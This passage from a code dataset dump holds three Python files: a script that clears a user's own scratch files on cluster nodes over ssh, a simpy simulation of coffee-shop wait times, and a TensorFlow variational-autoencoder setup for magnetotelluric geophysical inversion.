dirs\n\n\ndef absPathOfThisScript():\n\treturn os.path.abspath(sys.argv[0])\n\n\ndef makeStringFromHostList(hostList):\n\tentities = []\n\tstartHost = hostList[0]\n\tfor ind, h in enumerate(hostList):\n\t\tif ind == 0:\n\t\t\tcontinue\n\t\tif not h == hostList[ind-1]+1:\n\t\t\tentities.append((startHost, hostList[ind-1]))\n\t\t\tstartHost = h\n\telse:\n\t\tentities.append((startHost, hostList[-1]))\n\thostStrings = []\n\tfor entity in entities:\n\t\tif entity[0] == entity[1]:\n\t\t\thostStrings.append(\"{:d}\".format(entity[0]))\n\t\telse:\n\t\t\thostStrings.append(\"{:d}-{:d}\".format(*entity))\n\treturn \",\".join(sorted(list(set(hostStrings))))\n\n\ndef parseHostsString(string):\n\thosts = []\n\ttokens = string.split(\",\")\n\tfor t in tokens:\n\t\tif \"-\" in t:\n\t\t\tfromTo = t.split(\"-\")\n\t\t\tif not len(fromTo) == 2:\n\t\t\t\traise HostsError(\"Bad format in hosts token '{:s}'.\\n\".format(\n\t\t\t\t\tt))\n\t\t\ttry:\n\t\t\t\thosts.extend(range(int(fromTo[0]), int(fromTo[1])+1))\n\t\t\texcept ValueError:\n\t\t\t\traise HostsError(\"Can't parse hosts token '{:s}'.\\n\".format(\n\t\t\t\t\tt))\n\t\telse:\n\t\t\ttry:\n\t\t\t\thosts.append(int(t))\n\t\t\texcept ValueError:\n\t\t\t\traise HostsError(\n\t\t\t\t\t\"Don't know what to do with hosts token '{:s}'.\\n\".format(t))\n\tfor h in hosts:\n\t\tif not h in allowedHosts:\n\t\t\traise HostsError(\"No such host: {:d}.\\n\".format(h))\n\thostnames = [\"Knecht{:0>2d}\".format(i) for i in sorted(list(set(hosts)))]\n\treturn hostnames\n\n\ndef parseCommandline():\n\tparser = OptionParser(usage=\"%prog [options] [ [ ...]]\"\n\t\t\"\\n\\nlogs in to specified hosts and deletes files or directories located\"\n\t\t\"\\nin the user scratch directories\"\n\t\t\"\\n{:s} and {:s}.\"\n\t\t\"\\nHostnames given as command line arguments supersede hosts specified\"\n\t\t\"\\nusing the --knechte option.\".format(\", \".join(getUserScratchDirs()[:-1]),\n\t\tgetUserScratchDirs()[-1]))\n\tparser.add_option(\"--dry-run\", help=\"Do not actually delete scratch files.\",\n\t\taction=\"store_true\", default=False, 
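# --- Editorial sketch (not a dataset record) --------------------------------
# The Code Jam record above flips a k-wide window whenever the left-to-right
# scan meets a '-'; that greedy is the standard optimal strategy, since once
# the scan passes position i only the flip starting exactly at i can still
# fix it. A compact version, checked against the published sample cases:
def min_flips(pancakes: str, k: int):
    row, flips = [c == "+" for c in pancakes], 0
    for i in range(len(row) - k + 1):
        if not row[i]:
            for j in range(i, i + k):
                row[j] = not row[j]
            flips += 1
    return flips if all(row) else "IMPOSSIBLE"

assert min_flips("---+-++-", 3) == 3
assert min_flips("+++++", 4) == 0
assert min_flips("-+-+-", 4) == "IMPOSSIBLE"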
dest=\"dryRun\")\n\tparser.add_option(\"-f\", \"--force\", help=\"Don't ask before deleting\"\n\t\t\"\\nfiles/dirs. Don't use this option if you have running jobs or want to keep\"\n\t\t\"\\nparticular scratch files.\", dest=\"force\", action=\"store_true\",\n\t\tdefault=False)\n\tparser.add_option(\"-k\", \"--knechte\", help=\"Only delete files on specified\"\n\t\t\"\\nnodes. Pass a comma-separated list of numbers. Ranges using '-' are also\"\n\t\t\"\\nallowed. Example: KNECHT_LIST=1,3-5,7,9 will cause this script to delete\"\n\t\t\"\\nscratch files on knecht01, knecht03, knecht04, knecht05, knecht07 and\"\n\t\t\"\\nknecht09. The default is '{:s}'.\".format(makeStringFromHostList(allowedHosts)),\n\t\taction=\"store\", default=makeStringFromHostList(allowedHosts), type=\"str\",\n\t\tdest=\"hostsString\", metavar=\"KNECHT_LIST\")\n\t# hidden option for execution on nodes\n\tparser.add_option(\"--delete-scratch-files-here\", help=SUPPRESS_HELP,\n\t\tdefault=False, action=\"store_true\", dest=\"doDelete\")\n\topts, args = parser.parse_args()\n\tif len(args) > 0:\n\t\topts.hosts = sorted(list(set(args)))\n\telse:\n\t\topts.hosts = parseHostsString(opts.hostsString)\n\treturn opts\n\n\ndef getHostname():\n\ttry:\n\t\treturn open(\"/etc/hostname\").read().strip()\n\texcept IOError:\n\t\tp = subprocess.Popen([\"/usr/bin/hostname\",], stdout=subprocess.PIPE)\n\t\treturn p.communicate()[0]\n\n\ndef deleteFileOrDir(fileOrDir, opts):\n\tif os.path.isdir(fileOrDir):\n\t\ttokenType = \"directory\"\n\telif os.path.isfile(fileOrDir):\n\t\ttokenType = \"file\"\n\telse:\n\t\treturn\n\tif not opts.force:\n\t\tsys.stdout.write(\"\\t{:s}: Delete '{:s}'? (y/N) > \".format(\n\t\t\tgetHostname(), fileOrDir))\n\t\tsys.stdout.flush()\n\t\tret = raw_input(\"\")\n\t\tif not ret.strip().lower().startswith(\"y\"):\n\t\t\treturn\n\t# now delete file or dir \n\tcmd = [\"rm\", \"-rf\", fileOrDir]\n\tsys.stdout.write(\"\\tDeleting '{:s}'.\\n\".format(fileOrDir))\n\tsys.stdout.flush()\n\tif not opts.dryRun:\n\t\tp = subprocess.Popen(cmd)\n\t\tp.wait()\n\n\ndef isOwnedByMe(path):\n\treturn os.getuid() == os.stat(path).st_uid\n\n\ndef collectScratchFilesAndDirs():\n\tuserScratchDirs = getUserScratchDirs()\n\tfilesAndDirs = []\n\tfor s in userScratchDirs:\n\t\ttry:\n\t\t\tos.stat(s)\n\t\t\tif not os.path.isdir(s):\n\t\t\t\tcontinue\n\t\texcept OSError:\n\t\t\tcontinue\n\t\tfilesAndDirs.extend([os.path.join(s, i) for i in os.listdir(s)\n\t\t\tif isOwnedByMe(os.path.join(s, i)) and not os.path.join(s, i) in userScratchDirs])\n\treturn filesAndDirs\n\n\ndef deleteScratchFilesAndDirs(opts):\n\thostname = getHostname()\n\tif not \"knecht\" in hostname.lower():\n\t\traise ExecutionError(\"Expected to run on a knecht.\"\n\t\t\t\" Found to be executed on host '{:s}' instead.\\n\".format(\n\t\t\thostname))\n\tfor fileOrDir in collectScratchFilesAndDirs():\n\t\tdeleteFileOrDir(fileOrDir, opts)\n\n\ndef processHost(hostname, opts):\n\tsys.stdout.write(\"Processing host: {:s}\\n\".format(hostname))\n\tsys.stdout.flush()\n\tcmd = [\n\t\t\"/usr/bin/ssh\",\n\t\thostname,\n\t\tabsPathOfThisScript(),\n\t\t\"--delete-scratch-files-here\"\n\t]\n\tif opts.force:\n\t\tcmd.append(\"--force\")\n\tif opts.dryRun:\n\t\tcmd.append(\"--dry-run\")\n\tp = subprocess.Popen(cmd)\n\tp.wait()\n\n\ndef processHosts(opts):\n\tfor h in opts.hosts:\n\t\tprocessHost(h, opts)\n\n\ndef main():\n\topts = parseCommandline()\n\tif opts.doDelete:\n\t\tdeleteScratchFilesAndDirs(opts)\n\t\tsys.exit(0)\n\telse:\n\t\tprocessHosts(opts)\n\n\nif __name__ == 
\"__main__\":\n\tmain()\n\n","repo_name":"mfherbst/dreuwBin","sub_path":"queuing_system/cleanup_scratch.py","file_name":"cleanup_scratch.py","file_ext":"py","file_size_in_byte":5798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1426487073","text":"# Importing libraries\r\nimport simpy\r\nimport random\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport dataframe_image as dfi\r\n\r\n# Initialising dictionary\r\nmenu = {1:[\"Black Coffee\", 4, 6],\r\n 2:[\"Latte\", 5, 8],\r\n 3:[\"Cappuccino\", 6, 8],\r\n 4:[\"Espresso\", 5, 7],\r\n 5:[\"Tea\", 3, 5]}\r\n\r\npayment_option = {1:[\"Card\", 2, 4],\r\n 2:[\"Cash\", 3, 5]}\r\n \r\n# Initialising variables\r\nnum_of_cashier = 2\r\nnum_of_barista = 3\r\n\r\n# Generate customers \r\n\r\n# Arrival rate of 20 customers/hour, based on a Poisson distribution\r\nnum_of_customers = int(np.random.poisson(20, 1)+1)\r\nnum_of_customers\r\n\r\ndef generate_cust(env, cashier, barista):\r\n for i in range(num_of_customers):\r\n yield env.timeout(random.randint(1, 60))\r\n env.process(customer(env, cashier, barista))\r\n \r\n \r\n# Define customer processes\r\ndef customer(env, cashier, barista):\r\n with cashier.request() as req:\r\n start_cq = env.now\r\n yield req\r\n payment_wait_time.append(env.now - start_cq)\r\n menu_item = random.randint(1, 5) # Choosing random menu\r\n payment_type = random.randint(1, 2) # Generate random payment type\r\n time_to_order = random.randint(payment_option[payment_type][1], payment_option[payment_type][2])\r\n yield env.timeout(time_to_order)\r\n payment_time.append(env.now - start_cq)\r\n \r\n with barista.request() as req:\r\n start_bq = env.now\r\n yield req\r\n order_wait_time.append(env.now - start_bq)\r\n time_to_collect = random.randint(menu[menu_item][1], menu[menu_item][2])\r\n yield env.timeout(time_to_collect)\r\n order_time.append(env.now - start_bq)\r\n \r\n# Run the model 100 times\r\nresults = []\r\n\r\nfor i in range(100):\r\n payment_wait_time = []\r\n payment_time = []\r\n order_wait_time = []\r\n order_time = []\r\n \r\n env = simpy.Environment()\r\n cashier = simpy.Resource(env, num_of_cashier)\r\n barista = simpy.Resource(env, num_of_barista)\r\n \r\n for i in range(8): # 8 hours\r\n env.process(generate_cust(env, cashier, barista))\r\n \r\n env.run(until=480)\r\n #print(len(payment_time))\r\n #print(payment_time)\r\n \r\n results.append([np.mean(payment_wait_time), np.mean(payment_time),\r\n np.mean(order_wait_time), np.mean(order_time)])\r\n\r\n# Create dataframe for the results\r\ndf = pd.DataFrame(results,columns=[\"payment_wait_time\", \"payment_time\", \"order_wait_time\", \"order_time\"])\r\n\r\ndf[\"total_time\"] = df.sum(axis=1)\r\n\r\nprint(df.head())\r\n\r\n# Descriptive statistics\r\nprint(df.describe())\r\n\r\n# Line graph\r\nplt.title(\"Coffee Shop Wait Time\")\r\n\r\nplt.plot(df.payment_wait_time)\r\nplt.plot(df.payment_time)\r\nplt.plot(df.order_wait_time)\r\nplt.plot(df.order_time)\r\nplt.plot(df.total_time)\r\nplt.legend([\"payment_wait_time\", \"payment_time\", \"order_wait_time\", \"order_time\", \"total_time\"],\r\n bbox_to_anchor = (1.05, 0.6))\r\n\r\nplt.show()\r\n\r\n\r\n# Histogram\r\n\r\nplt.title(\"Total Wait 
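# --- Editorial sketch (not a dataset record) --------------------------------
# cleanup_scratch.py above parses host specs like "1,3-5,7,9" into a sorted,
# de-duplicated host list and formats names as Knecht01, Knecht02, ... The
# core parsing as a small pure function, minus the record's validation:
def parse_ranges(spec: str):
    hosts = set()
    for token in spec.split(","):
        if "-" in token:
            lo, hi = (int(x) for x in token.split("-"))
            hosts.update(range(lo, hi + 1))
        else:
            hosts.add(int(token))
    return sorted(hosts)

assert parse_ranges("1,3-5,7,9") == [1, 3, 4, 5, 7, 9]
assert [f"Knecht{h:02d}" for h in parse_ranges("2-3")] == ["Knecht02", "Knecht03"]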
Time\")\r\n\r\nplt.hist(df.total_time)\r\nplt.show()","repo_name":"varaah/coffee-shop-simulation","sub_path":"simulation-coffee-shop.py","file_name":"simulation-coffee-shop.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19730202018","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Nov 3 20:30:55 2021\r\n\r\n@author: RuiGuo\r\n\"\"\"\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Oct 17 14:14:17 2021\r\n\r\n@author: RuiGuo\r\n\"\"\"\r\n\r\n\r\nimport time\r\nimport os\r\nimport platform\r\nimport numpy as np\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\nfrom tensorflow.keras import layers\r\nimport matplotlib.pyplot as plt\r\nimport scipy.io as sio\r\nfrom numpy.linalg import norm\r\nfrom scipy.io import savemat, loadmat\r\nfrom scipy.ndimage import filters\r\n\r\n# from tensorflow.keras.models import load_model\r\nfrom tensorflow.keras.layers import Input, Dense, Conv1D, Activation, MaxPool1D, Dropout\r\nfrom tensorflow.keras.layers import BatchNormalization, Flatten, Reshape, Conv1DTranspose, LeakyReLU\r\nfrom tensorflow.keras.models import Model\r\nfrom tensorflow.keras.optimizers import Adam, SGD\r\nfrom tensorflow.keras.datasets import mnist\r\nimport multiprocessing\r\nimport functools\r\nimport json\r\n# from pathos.multiprocessing import ProcessingPool\r\nimport random\r\nfrom tensorflow.keras import backend as K\r\n\r\nimport helpers_jointencoding as h_je\r\nimport math\r\nimport MT2DFWD2 as MT\r\nimport Jacobians as jacos\r\nfrom scipy.interpolate import RectBivariateSpline as rbs\r\n\r\nimport tensorflow as tf\r\ngpus = tf.config.experimental.list_physical_devices('GPU')\r\nif gpus:\r\n try:\r\n for gpu in gpus:\r\n tf.config.experimental.set_memory_growth(gpu, True)\r\n\r\n except RuntimeError as e:\r\n print(e)\r\n\r\nTRAIN = 0 ### TRAIN=0: Inversion ### TRAIN=1: TRAIN THENET ### TRAIN=2: test the net\r\nprint('TRAIN = {}'.format(TRAIN))\r\nSELECT_AS_INVERSIONMODE = 0 # 0 don't use multiprocerssing\r\nSEL_ACTIFUNC = 1 # what activation function is used. 1 means swish\r\nmax_iter = 13\r\nlamda = 0.07e-3 #\r\nlambda_decay = 0.95\r\nbeta = 6E-3\r\nbeta2 = 0 # Vertical regularization\r\nkl_weight = 10E-3 # 1e-2\r\nssim_w = 40E-2 # 1e-2\r\nVAE_NO = 81\r\nVAE_NO2 = 81\r\nlatent_dim = 16\r\nlatent_dim2 = 16\r\ntrmono = 0\r\nPINGHUA = 1\r\nN1 = 1 # For training use 30000, for test use 8000\r\nTB = 1 # Two block, another block plus what\r\nbar_1 = np.log10(1)\r\nbar_2 = np.log10(320)\r\ninitial_res = np.log10(200)\r\nCost_threshold = 0.005 # for one block, 1E-3better! 
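# --- Editorial sketch (not a dataset record) --------------------------------
# simulation-coffee-shop.py above layers two simpy.Resource queues (cashier,
# then barista). The core pattern, request a resource, measure the wait,
# hold it for the service time, in its smallest runnable form. Requires the
# simpy package; capacity and service times here are illustrative only.
import random
import simpy

waits = []

def customer(env, counter):
    arrived = env.now
    with counter.request() as req:
        yield req                        # queue until a server is free
        waits.append(env.now - arrived)  # time spent waiting in line
        yield env.timeout(random.randint(4, 8))  # service time

env = simpy.Environment()
counter = simpy.Resource(env, capacity=2)
for _ in range(10):
    env.process(customer(env, counter))
env.run(until=60)
print(f"mean wait: {sum(waits) / len(waits):.1f} min")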
# Change convergence logic\r\nDelta_cost_threshold = 0.0005\r\nUse_ref = 1\r\nAdd_noise = 1\r\n# dir_name = 'training_rho_middle_dataset_vae_'+str(VAE_NO) # Network direction\r\ndir_name = '../myHTEM_20220707_for_1D_VAE/HTEM_network' + '/Net_' + str(VAE_NO)\r\ndir_name2 = '../myHTEM_20220707_for_1D_VAE/HTEM_network' + '/Net_' + str(VAE_NO2)\r\nfre1 = 0.5\r\nfre2 = 4\r\nfreqNumberMT = 14\r\nUID = 'model20220811b_vae_{:d}&{:d}_lmbd_{:2f}_dcy_{:2f}_beta_{:2f}_ur_{}_AN_{}_noi0.5perc_fre{}-{}_{}_beta2_{}'.\\\r\n format(VAE_NO,VAE_NO2, lamda, lambda_decay,beta,Use_ref,Add_noise,fre1,fre2,freqNumberMT,beta2)\r\n# if TRAIN == 1:\r\n# from tensorflow.python.framework.ops import disable_eager_execution\r\n# disable_eager_execution()\r\nif latent_dim == 128:\r\n plot_x = 8\r\n plot_y = 16\r\nif latent_dim == 64:\r\n plot_x=8\r\n plot_y=8\r\nif latent_dim == 16:\r\n plot_x=4\r\n plot_y=4\r\nif latent_dim == 36:\r\n plot_x=6\r\n plot_y=6\r\nsys = platform.system()\r\nif sys == \"Windows\":\r\n print(\"OS is Windows.\")\r\nelif sys == \"Linux\":\r\n # plt.switch_backend('Agg')\r\n print(\"OS is Linux.\")\r\n if TRAIN == 1 or TRAIN == 0:\r\n gpus = tf.config.list_physical_devices(device_type='GPU')\r\n tf.config.set_visible_devices(devices=gpus[0], device_type='GPU')\r\n tf.config.experimental.set_memory_growth(device=gpus[0], enable=True)\r\n # else:\r\n # cpu = tf.config.list_physical_devices(device_type='CPU')\r\n # tf.config.set_visible_devices(devices=cpu[0], device_type='CPU')\r\n # tf.config.experimental.set_memory_growth(device=cpu[0], enable=False)\r\n\r\nclass Sampling(tf.keras.layers.Layer):\r\n \"\"\"Uses (z_mean, z_log_var) to sample z, the vector encoding a digit.\"\"\"\r\n def call(self, inputs):\r\n z_mean, z_log_var = inputs\r\n batch = tf.shape(z_mean)[0]\r\n dim = tf.shape(z_mean)[1]\r\n epsilon = tf.keras.backend.random_normal(shape=(batch, dim))\r\n return z_mean + tf.exp(0.5 * z_log_var) * epsilon\r\n \r\n# %% Simulation Setup\r\n\r\nfieldXStart = 0\r\nfieldXEnd = 10000\r\nXNumberMT = 100\r\nxEdgeLocationMT = np.linspace(fieldXStart, fieldXEnd, XNumberMT + 1)\r\nxElementLocationMT = 0.5 * (xEdgeLocationMT[0:-1] + xEdgeLocationMT[1:])\r\nZNumberMT = 80\r\ndh = np.zeros(ZNumberMT)\r\nfor i in range(ZNumberMT):\r\n # dh[i] = 5 * math.pow(1.051,i) # 5 km\r\n dh[i] = 2.5 * math.pow(1.047, i) # 2 km\r\nzEdgeLocationMT = np.concatenate(([0],np.cumsum(dh)))\r\nzElementLocationMT = 0.5 * (zEdgeLocationMT[0:-1] + zEdgeLocationMT[1:])\r\n[xMT, yMT] = np.meshgrid(xElementLocationMT, -zElementLocationMT)\r\n[xElementLengthMT, zElementLengthMT] = np.meshgrid(np.diff(xEdgeLocationMT), np.diff(zEdgeLocationMT))\r\nelementSizeMT = xElementLengthMT * zElementLengthMT\r\ngridNumberMT = ZNumberMT * XNumberMT\r\ntimestamp2 = time.time()\r\ndomainDepth = zEdgeLocationMT[-1]\r\n\r\nXNumberMT1 = 50\r\nxEdgeLocationMT1 = np.linspace(fieldXStart, fieldXEnd, XNumberMT1 + 1)\r\ninterpXLocations = 0.5 * (xEdgeLocationMT1[0:-1] + xEdgeLocationMT1[1:])\r\nZNumberMT1 = 64\r\ndh1 = np.zeros(ZNumberMT1)\r\nfor i in range(ZNumberMT1):\r\n # dh1[i] = 12 * math.pow(1.050,i) # 5 km\r\n # dh1[i] = 12 * math.pow(1.009, i) # 1 km\r\n dh1[i] = 5 * math.pow(1.032, i) # 1 km\r\nzEdgeLocationMT1 = np.concatenate(([0],np.cumsum(dh1)))\r\ninterpDepths = 0.5 * (zEdgeLocationMT1[0:-1] + zEdgeLocationMT1[1:])\r\n[interX, interZ] = np.meshgrid(interpXLocations, -interpDepths)\r\n\r\n# val_rate=1\r\n#\r\n# name=\"/home/hy-zhou/matlab/rho_vel2sD_8000.mat\"\r\n# name = \"/home/hy-zhou/matlab/rho_vel/rho_vel0s/rho_vel0s_7400.mat\"\r\n# 
name = \"/home/hy-zhou/joint_encoding/simple_set_dataset/simple_set1.mat\"\r\n# name = \"/home/hy-zhou/joint_encoding/middle_dataset/middle_set1.mat\"\r\n# name = \"/home/hy-zhou/joint_encoding/middle_dataset/middle_set_outlier2.mat\"\r\n# '''是否对训练集平滑'''\r\n# w1 = h_je.fspecial_gaussian(np.array([4, 4]), 4)\r\n#\r\n# rhovels = loadmat(name)\r\n# rhoTruth = rhovels['logFieldRhoInv']\r\n# rhoTruth1 = np.zeros((64, 128, N1))\r\n# for ii in range(N1):\r\n# VLayeredMatTemp = h_je.interp2_nearest(xMT,yMT,np.reshape(rhoTruth[ii,:],(ZNumberMT, XNumberMT), order='f'), interX, interZ)\r\n# if PINGHUA:\r\n# rhoTruth1[:,:,ii] = filters.convolve(VLayeredMatTemp, w1)\r\n#\r\n# rhoTruth1 = rhoTruth1.transpose((2,0,1))\r\n# rhoTruth1 = np.expand_dims(rhoTruth1, axis=3)\r\n#\r\n# indices = list(range(N1))\r\n# # random.shuffle(indices)\r\n# train_ind = indices[:int(N1*(1-val_rate))]\r\n# val_ind = indices[int(N1*(1-val_rate)):]\r\n# #\r\n# # train_ind = np.load('train_ind.npy').tolist()\r\n# # val_ind = np.load('val_ind.npy').tolist()\r\n# rho_train = rhoTruth1[train_ind,:, :,:]\r\n# rho_test = rhoTruth1[val_ind, :, :, :]\r\n# # np.save('train_ind.npy', np.array(train_ind, dtype='uint16'))\r\n# # np.save('val_ind.npy', np.array(val_ind, dtype='uint16'))\r\n#\r\n# del rhoTruth\r\n# del rhoTruth1\r\n\r\n# %% Network1\r\nH = 64\r\nC = 1\r\n## Latent space\r\n\r\ninputs = Input(shape=(H,C), name=\"inputs\") # 64 1\r\nif True:\r\n x = inputs\r\n\r\n x = Conv1D(16, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n # x = MaxPool1D(2)(x) # 32 16\r\n\r\n x = Conv1D(16, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n x = MaxPool1D(2)(x) # 32 16\r\n\r\n x = Conv1D(32, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n # x = MaxPool1D(2)(x) # 16 32\r\n\r\n x = Conv1D(32, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n x = MaxPool1D(2)(x) # 16 32\r\n\r\n x = Conv1D(64, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n # x = MaxPool1D(2)(x) # 8 64\r\n\r\n x = Conv1D(64, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n x = MaxPool1D(2)(x) # 8 64\r\n\r\n x = Flatten()(x)\r\n units = x.shape[1]\r\n z_mean = Dense(latent_dim, name=\"z_mean\")(x)\r\n z_log_var = Dense(latent_dim, name=\"z_log_var\")(x)\r\n\r\n meanModel = Model(inputs,z_mean) # 64 - 8\r\n # encoder_output = Sampling()((z_mean, z_log_var))\r\n encoder_output = Sampling()((meanModel(inputs), z_log_var))\r\n\r\n encoder = Model(inputs,encoder_output)\r\n # encoder.compile(optimizer=Adam(1e-3), loss='mse')\r\n encoder.summary()\r\n\r\n decoder_inputs = Input(shape = (latent_dim), name=\"decoder_inputs\")\r\n x = Dense(units)(decoder_inputs)\r\n x = keras.activations.swish(x)\r\n x = Reshape((8, 64))(x)\r\n\r\n x = Conv1DTranspose(32, 3, strides=2, padding=\"same\")(x) # 16 32\r\n x = Conv1D(32, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n\r\n x = Conv1D(32, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n\r\n x = Conv1DTranspose(16, 3, strides=2, padding=\"same\")(x) # 32 16\r\n x = Conv1D(16, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n\r\n x = Conv1D(16, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = 
keras.activations.swish(x)\r\n\r\n x = Conv1DTranspose(1, 3, strides=2, padding=\"same\")(x) # 64 1\r\n x = Conv1D(1, 3, padding=\"same\")(x)\r\n\r\noutputs = x\r\ndecoder = Model(decoder_inputs, outputs)\r\ndecoder.summary()\r\n\r\noutputs = decoder(encoder_output)\r\nvae = Model(inputs, outputs)\r\nkl_loss = kl_weight * -0.5 * tf.reduce_mean(z_log_var - tf.square(z_mean) - tf.exp(z_log_var) + 1)\r\nvae.add_loss(kl_loss)\r\n# ssim_loss = 1-tf.reduce_mean(tf.image.ssim(inputs,outputs,max_val=1))\r\n# vae.add_loss(ssim_loss)\r\ndef my_loss_fn(y_true, y_pred):\r\n loss1=tf.reduce_mean(tf.square(y_true - y_pred), axis=-1)\r\n loss2= 1-tf.reduce_mean(tf.image.ssim(y_true,y_pred,max_val=1))\r\n # loss3 = 1e-2 * -0.5 * tf.reduce_mean(z_log_var - tf.square(z_mean) - tf.exp(z_log_var) + 1)\r\n return loss1 + ssim_w * loss2\r\n\r\ndef mse_loss(y_true, y_pred):\r\n return tf.reduce_mean(tf.square(y_true - y_pred), axis=-1)\r\n\r\ndef ssim_loss(y_true, y_pred):\r\n return 1e-2*(1-tf.reduce_mean(tf.image.ssim(y_true,y_pred,max_val=1)))\r\n\r\nlr_schedule = keras.callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.2,\r\n patience=10, min_lr=0.000001, verbose=1)\r\nvae.compile(optimizer=Adam(learning_rate=5e-4), loss=my_loss_fn, metrics=[mse_loss])\r\nvae.summary()\r\n\r\n# %% Network 2\r\ninputs = Input(shape=(H,C), name=\"inputs\") # 64 1\r\nif True:\r\n x = inputs\r\n\r\n x = Conv1D(16, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n # x = MaxPool1D(2)(x) # 32 16\r\n\r\n x = Conv1D(16, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n x = MaxPool1D(2)(x) # 32 16\r\n\r\n x = Conv1D(32, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n # x = MaxPool1D(2)(x) # 16 32\r\n\r\n x = Conv1D(32, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n x = MaxPool1D(2)(x) # 16 32\r\n\r\n x = Conv1D(64, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n # x = MaxPool1D(2)(x) # 8 64\r\n\r\n x = Conv1D(64, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n x = MaxPool1D(2)(x) # 8 64\r\n\r\n x = Flatten()(x)\r\n units = x.shape[1]\r\n z_mean = Dense(latent_dim2, name=\"z_mean\")(x)\r\n z_log_var = Dense(latent_dim2, name=\"z_log_var\")(x)\r\n\r\n meanModel2 = Model(inputs,z_mean) # 64 - 8\r\n # encoder_output = Sampling()((z_mean, z_log_var))\r\n encoder_output = Sampling()((meanModel2(inputs), z_log_var))\r\n\r\n encoder = Model(inputs,encoder_output)\r\n # encoder.compile(optimizer=Adam(1e-3), loss='mse')\r\n encoder.summary()\r\n\r\n decoder_inputs = Input(shape = (latent_dim2), name=\"decoder_inputs\")\r\n x = Dense(units)(decoder_inputs)\r\n x = keras.activations.swish(x)\r\n x = Reshape((8, 64))(x)\r\n\r\n x = Conv1DTranspose(32, 3, strides=2, padding=\"same\")(x) # 16 32\r\n x = Conv1D(32, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n\r\n x = Conv1D(32, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n\r\n x = Conv1DTranspose(16, 3, strides=2, padding=\"same\")(x) # 32 16\r\n x = Conv1D(16, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n\r\n x = Conv1D(16, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n\r\n x = Conv1DTranspose(1, 3, strides=2, 
padding=\"same\")(x) # 64 1\r\n x = Conv1D(1, 3, padding=\"same\")(x)\r\n\r\noutputs = x\r\ndecoder2 = Model(decoder_inputs, outputs)\r\ndecoder2.summary()\r\n\r\noutputs = decoder2(encoder_output)\r\nvae2 = Model(inputs, outputs)\r\n\r\n# %%\r\nbatch_size=int(64)\r\n\r\ncheckpoint_path = dir_name + '/cp.ckpt'\r\ncheckpoint_path2 = dir_name2 + '/cp.ckpt'\r\n# checkpoint_path = \"training_2/cp-{epoch:04d}.ckpt\"\r\n\r\ncheckpoint_dir = os.path.dirname(checkpoint_path)\r\ncp_callback = tf.keras.callbacks.ModelCheckpoint(filepath=checkpoint_path,verbose=1,\r\n save_best_only=True, save_weights_only=True)\r\n\r\ncheckpoint_dir2 = os.path.dirname(checkpoint_path2)\r\n\r\nif TRAIN == 1:\r\n vae.save_weights(checkpoint_path.format(epoch=0))\r\n history = vae.fit(\r\n rho_train,\r\n rho_train,\r\n epochs=200,\r\n batch_size=batch_size,\r\n shuffle=True,\r\n validation_data=(rho_test, rho_test),callbacks=[cp_callback, lr_schedule]\r\n )\r\n # os.listdir(checkpoint_dir)\r\n import pandas as pd\r\n\r\n # convert the history.history dict to a pandas DataFrame:\r\n hist_df = pd.DataFrame(history.history)\r\n\r\n # save to json:\r\n hist_json_file = dir_name + '/history.json'\r\n with open(hist_json_file, mode='w') as f:\r\n hist_df.to_json(f)\r\n\r\n with open(dir_name + '/history.json','r',encoding='utf8')as fp:\r\n json_data = json.load(fp) #\r\n # or save to csv:\r\n # hist_csv_file = dir_name + '/history.csv'\r\n # with open(hist_csv_file, mode='w') as f:\r\n # hist_df.to_csv(f)\r\n\r\nlatest = tf.train.latest_checkpoint(checkpoint_dir)\r\nvae.load_weights(latest)\r\n\r\nlatest2 = tf.train.latest_checkpoint(checkpoint_dir2)\r\nvae2.load_weights(latest2)\r\n# with open('/trainHistoryDict', 'wb') as file_pi:\r\n# pickle.dump(history.history, file_pi)\r\n\r\n# %% Generate row data\r\n#time_start = time.time()\r\nif TRAIN == 1 or TRAIN == 2:\r\n for jj in range(5):\r\n rho_test_no = int(jj)\r\n rho_test_no1 = rho_test[rho_test_no:rho_test_no+1,:,:,:]\r\n v_true = meanModel(rho_test_no1) # input can be tensor or numpy, output is numpy\r\n v1 = 